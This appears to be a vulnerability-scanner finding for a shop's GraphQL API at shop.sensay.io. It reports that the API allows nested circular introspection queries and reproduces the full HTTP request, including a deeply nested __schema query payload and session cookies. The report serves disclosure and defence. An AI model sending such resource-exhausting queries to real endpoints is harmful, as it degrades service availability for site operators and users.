Your web application's GraphQL API has been identified to allow nested queries with circular relationships through introspection. This configuration can lead to complex queries that consume an excessive amount of resources, potentially resulting in a Denial of Service (DoS) attack that reduces the availability of your GraphQL API and affects the overall performance of your web application.

POST /api/graphql HTTP/1.1

Content-Type: application/json

Accept:

Cookie: localization=GB; _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22DENW%22%2C%22reg%22%3A%22%22%2C%22purposes%22%3A%7B%22a%22%3Afalse%2C%22p%22%3Afalse%2C%22m%22%3Afalse%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Atrue%2C%22sale_of_data_region%22%3Afalse%2C%22consent_id%22%3A%220E1087C7-1c66-4699-b905-8523f4c07463%22%7D

Content-Length: 155

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36

Host: shop.sensay.io

Connection: Keep-alive

{"query":"query inv { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }","operationName":"inv"}